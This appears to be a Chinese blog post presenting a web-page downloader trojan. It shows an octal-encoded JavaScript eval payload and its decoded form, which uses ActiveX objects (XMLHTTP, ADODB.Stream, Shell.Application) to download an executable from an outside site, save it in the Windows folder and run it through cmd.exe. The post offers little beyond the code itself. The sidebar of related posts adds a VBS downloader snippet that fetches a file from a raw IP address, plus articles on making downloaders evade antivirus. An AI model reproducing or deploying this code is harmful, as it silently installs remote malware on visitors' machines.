又一个网页下载者木马

最新推荐文章于 2024-01-22 21:14:29 发布
最新推荐文章于 2024-01-22 21:14:29 发布
阅读量301 收藏
点赞数
文章标签: javascript shell ViewUI

文件: http://xxxx.xxx.xxx/web.htm

ExpandedBlockStart.gif ContractedBlock.gif < SCRIPT  LANGUAGE ="JavaScript" > dot.gif
ExpandedBlockEnd.gifeval("\146\165\156\143\164\151\157\156\40\147\156\50\156\51\40\173\40\166\141\162\40\156\165\155\142\145\162\40\75\40\115\141\164\150\56\162\141\156\144\157\155\50\51\52\156\73\40\162\145\164\165\162\156\40\47\176\164\155\160\47\53\115\141\164\150\56\162\157\165\156\144\50\156\165\155\142\145\162\51\53\47\56\145\170\145\47\73\40\175\40\15\12\164\162\171\40\173\40\15\12\166\141\162\40\155\155\61\75\42\150\164\164\160\72\42\73\15\12\155\155\62\75\42\57\57\42\73\15\12\155\155\63\75\42\167\167\167\56\65\65\144\152\56\156\145\164\57\170\171\56\145\170\145\42\73\15\12\144\154\75\155\155\61\53\155\155\62\53\155\155\63\73\40\15\12\141\61\75\42\157\142\152\145\143\164\42\73\141\62\75\42\143\154\141\163\163\151\144\42\73\15\12\141\63\75\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\73\15\12\141\64\75\42\101\144\157\144\142\56\123\164\162\145\141\155\42\73\15\12\146\165\143\153\75\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\73\15\12\144\146\75\50\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\141\61\51\51\73\40\15\12\144\146\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\141\62\54\141\63\51\73\40\15\12\166\141\162\40\170\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\42\53\42\115\42\53\42\114\42\53\42\110\42\53\42\124\42\53\42\124\42\53\42\120\42\54\42\42\51\73\40\15\12\166\141\162\40\123\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\141\64\54\42\42\51\73\40\123\133\42\164\171\160\145\42\135\75\61\73\40\15\12\170\133\42\117\160\145\156\42\135\50\42\107\105\124\42\54\40\144\154\54\60\51\73\40\15\12\170\133\42\123\145\156\144\42\135\50\51\73\40\15\12\146\156\141\155\145\61\75\147\156\50\61\60\60\60\60\51\73\40\15\12\166\141\162\40\106\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\146\165\143\153\54\42\42\51\73\40\15\12\166\141\162\40\164\155\160\75\106\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\40\15\12\146\156\141\155\145\61\75\40\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\54\146\156\141\155\145\61\51\73\40\15\12\123\133\42\157\160\145\156\42\135\50\51\73\15\12\123\133\42\127\162\151\164\145\42\135\50\170\56\162\145\163\160\157\156\163\145\102\157\144\171\51\73\40\15\12\123\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\146\156\141\155\145\61\54\62\51\73\40\15\12\123\133\42\103\154\157\163\145\42\135\50\51\73\40\15\12\166\141\162\40\121\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\40\15\12\145\170\160\61\75\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\121\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\146\156\141\155\145\61\54\42\42\54\157\160\145\156\54\60\51\73\40\175\40\143\141\164\143\150\50\151\51\40\173\40\151\75\61\73\40\175")
None.gif </ SCRIPT >

通过解码后:

ExpandedBlockStart.gif ContractedBlock.gif function  gn(n)  dot.gif var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; }  
ExpandedBlockStart.gifContractedBlock.gif try   dot.gif
InBlock.gifvar mm1="http:";
InBlock.gifmm2="//";
InBlock.gifmm3="www.55dj.net/xy.exe";
InBlock.gifdl=mm1+mm2+mm3; 
InBlock.gifa1="object";a2="classid";
InBlock.gifa3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
InBlock.gifa4="Adodb.Stream";
InBlock.giffuck="Scripting.FileSystemObject";
InBlock.gifdf=(window["document"]["createElement"](a1)); 
InBlock.gifdf["setAttribute"](a2,a3); 
InBlock.gifvar x=df["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); 
InBlock.gifvar S=df["CreateObject"](a4,""); S["type"]=1
InBlock.gifx["Open"]("GET", dl,0); 
InBlock.gifx["Send"](); 
InBlock.giffname1=gn(10000); 
InBlock.gifvar F=df["CreateObject"](fuck,""); 
InBlock.gifvar tmp=F["GetSpecialFolder"](0); 
InBlock.giffname1= F["BuildPath"](tmp,fname1); 
InBlock.gifS["open"]();
InBlock.gifS["Write"](x.responseBody); 
InBlock.gifS["SaveToFile"](fname1,2); 
InBlock.gifS["Close"](); 
InBlock.gifvar Q=df["CreateObject"]("Shell.Application",""); 
InBlock.gifexp1=F["BuildPath"](tmp+'\\system32','cmd.exe');
ExpandedBlockStart.gifContractedBlock.gifQ["ShellExecute"](exp1,' /c '+fname1,"",open,0); }   catch (i)  dot.gif { i=1; }
None.gif


 

weixin_34007906
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
二行代码解决全部网页木马
12-11
网页木马是一种恶意代码,通常通过嵌入到网页中,以欺骗用户访问或执行有害操作。近年来,攻击者不断变换手法,从早期的iframe挂马转向利用标签来植入木马。这些木马会通过链接到外部恶意网址,进而下载并执行恶意...
VBS下载者免杀
weixin_30407099的博客
08-21 354
Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://202.75.208.29/calc.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode...
超强下载者免杀
cjs916的专栏
12-12 1159
超强下载者免杀By DarkRaY[D.S.T]你在本文可以学到:1.    如何挑选下载者2.    如何免杀下载者①选择下载者现在是个网页木马横飞的年代,而一些比较稳定的远程控制木马的体积都很大,为了方便木马的传播,于是便有了下载者的产生,它是连接起网页木马和隐藏在幕后黑手的沟通桥梁。世面上的下载者随处可见,但一个真正好使用的下载者应该具备什么样的功能呢?在我认为至
简单免杀下载者 永远不被杀毒发现
weixin_34409741的博客
12-21 251
自己写的一个下载者 因为没有复杂的东西 所以杀毒一般不会报毒的 不过缺点也是有的 自己开发吧 Option Explicit Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal...
[源码]Delphi源码免杀之函数动态调用 实现免杀下载者
weixin_30437337的博客
03-09 191
[免杀]Delphi源码免杀之函数动态调用 实现免杀下载者2013-12-30 23:44:21 来源:K8拉登哥哥's Blog 自己编译这份代码看看 过N多杀软 没什么技术含量 只是发出来给不懂的人入入门 也防止有新人老是来问 ShellApi,URLMon 单元 //Delphi动态调用API函数 procedure TForm1.Butto...
使用vb轻松打造个人免杀下载者
trustyboy的专栏
02-04 706
    我们知道Visual Basic中对于网络的支持有个winsock控件可以轻易实现各种功能,但是使用了控件意味着 你的程序移植性将大大降低,在许多机器上你的程序将无法运行。这对木马等一些对可移植性要求高的程序简直就是一大遗憾,下面我介绍一种既快速又不使用winsock控件开发下载者的方法,如果有什么问题还望指教。Visual Basic中有个api-URLDownloadToFileA
VB实现网页木马
07-10
- **漏洞详情**:MS06014漏洞是针对Microsoft Data Access Components (MDAC)的一个安全漏洞,允许恶意网站通过HTML Object标签远程执行任意代码。 - **攻击流程**: - 攻击者在网页中嵌入恶意的HTML Object标签...
网页木马攻防实战.rar
11-29
网页木马攻防实战是网络安全领域的一个重要主题,它涵盖了从攻击到防御的多个关键环节。这个主题的历史和发展反映了互联网安全的演变过程。在早期,网页木马主要通过诱骗用户点击恶意链接或下载含有恶意代码的文件...
网页木马扫描器
02-25
web网页木马后门扫描器内置多种挂马特征库,能够轻松扫描出电脑中的web网页木马,如asp\php\jsp\pl\图片木马等等,保护网站安全。
网站恶意网页木马扫描器(WebshellScanner).zip
07-11
持扫描木马类型: asp/aspx/php/jsp/asa/cer 软件主要功能: 1.搜索网站里面的网页木马(Webshell) 2.生成统计报表 用来查询网站是不是被挂马了,一般用于服务器上的操作,或将服务器上的源码下载到本地,然后用此软件查找。 处理了一下第一版大家的要求,修复了一些小的bug,加入了自动更新程序,在windows2003、windows xp、windows 2000 server 无.net环境下测试通过,简单的更新说明如下: 1.添加自动升级模块,.net环境下可完成在线升级; -------------------------------------------------------- 升级需要请求服务器下载文件替换,如果下载失败,请手动下载更新。更新程序需要服务器装有.net v2.0.50727 版本以上的环境才能运行,因此不支持.net的服务器无法使用自动更新。 2.无需.net环境运行扫描程序; -------------------------------------------------------- 这个问题比较头疼的,程序是.NET 开发的,需要安装 .NET Framework,但Windows 2000、Windows XP 和 Windows 2003 默认都没有.NET 2.0 运行环境。于是利用移动飞信的原理,利用fetion的程序加载主程序,可以使主程序可以运行在不支持.net的环境下。大家可以用VMDotNet包中的文件运行大多数.net开发的程序,如果缺少dll,加上即可。 3.添加asp规则,主要针对asp的webshell绕过机制; -------------------------------------------------------- 由于本来的规则基本是lake2的规则以及少许修改版,于是很多同志找出了很多绕过逃避检测的机制,比如用access或者excel创建asp文件的小马,比如include包含gif之类的伎俩等等等等。本版中这些绕过机制均得到处理。(还想绕过的朋友try一下看看我的正则健壮不健壮) 4.更新php规则,添加了eval下运行的少数加密函数; -------------------------------------------------------- php下把加密的文件先通过函数解密再eval运行,本次版本处理了几个不常见的函数:gzinflate 、str_rot13等等;php确实还有很多绕过的方法,而且很难检测,呜呼哀哉,我也没辙了... 5.增加了利用IIS6.0文件夹解析漏洞以及文件解析漏洞隐藏的shell的检查; -------------------------------------------------------- 这个没啥好说的,目录叫1.asp或者文件叫1.asp;2.jpg,很显然被人入侵了,需要仔细检查检查问题了。 6.修复一处bug(驱动器下第一层目录无法扫描); -------------------------------------------------------- 测试的时候无意中发现的,貌似还没有人向我提交这个问题,估计大家都直接扫目录的,并没有扫盘(确实没必要扫盘~) 
网页木马剖析与实现--论文
09-12
2. **下载木马程序**:通过Microsoft.XMLHTTP对象和ADODB.Stream对象等技术,网页木马可以从远程服务器下载木马程序到用户的计算机上。 3. **执行木马程序**:下载完成后,网页木马会利用各种技术绕过浏览器的安全...
网页木马文件扫描工具
01-11
总的来说,这个网页木马文件扫描工具不仅是一个实用的检测工具,也是一个学习安全编程和.NET技术的好资源。无论是对网络安全感兴趣,还是想要提升编程技能,都可以从这个项目中获益。不过,要注意的是,由于缺少特征...
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
热门推荐
Gleam的专栏
03-26 1万+
前言 这次我与大家分享的是我所总结的关于JS下载者脚本木马的分析与防御技术。之所以要选择这样的一个题目,是因为在日常的病毒分析工作中,每天都会遇到这类病毒样本,少则几个,多则几十个(当然了,更多的样本已经被自动分析系统拦截下来了)。而且这类的样本甚至还有愈演愈烈之势,很可能会长盛不衰。JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会
hack小游戏——Monyer-梦之光芒篇
D.MIND 的博客
02-08 446
2020.12.25 ~ 12.26 Monyer-梦之光芒篇(一款hacker小游戏)(http://monyer.com/game/game1/): 1. <meta http-equiv="refresh" content="3"> 3秒之后刷新本页面或访问指定页面 < meta http-equiv="Refresh" content="秒数; url=跳转的文件或地址" > 设置http-equiv中的refresh属性,可以设置网页3秒之后刷新本页面或访问
下载者+(原代码)
liuka的blog
02-04 2371
下载者运行后如果成功下载就会在HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run下生成Microsoft rigpsnap项自启下载的木马会在WINDOWS/system32下,重新命名为rigpsnap.exe如果由于没有联网或地址错误下载者就会等待10秒后再尝试下载如此反复,知道下载成功下载者的关键代码如下!void
机器狗病毒(又称下载者木马病毒)的手工毒杀
Bob的专栏
05-12 4434
    最近一同事中了机器狗病毒,最开始并不知道是什么病毒,发现启动项里有很多XXX.exe列表,先用REGEDIT,将其清楚,并将windows下的新建病毒清除,因为病毒中的比较早,当时用瑞星还无法查杀(今天升级完瑞星以后,可以查杀了。),手动删除以后重启,发现“网络邻居”属性里,无法找到“本地连接”图标,导致无法上网。可能是病毒将系统服务破坏了。网络邻居是使用“Network Connec
防御保护-第一天
最新发布
qq_51502737的博客
01-22 1000
网络安全:计算机网络环境下的信息安全。2003年美国提出网络空间的概念--- 一个由信息基础设施组成的互相依赖的网络。我国官方文件定义:网络空间为继海,陆,空,天以外的第五大人类活动领域企业面临的网络风险或者网络威胁主要有以下几种形式:1、网站入侵、网页内容篡改2、数据泄露3、网络勒索4、分布式拒绝服务攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值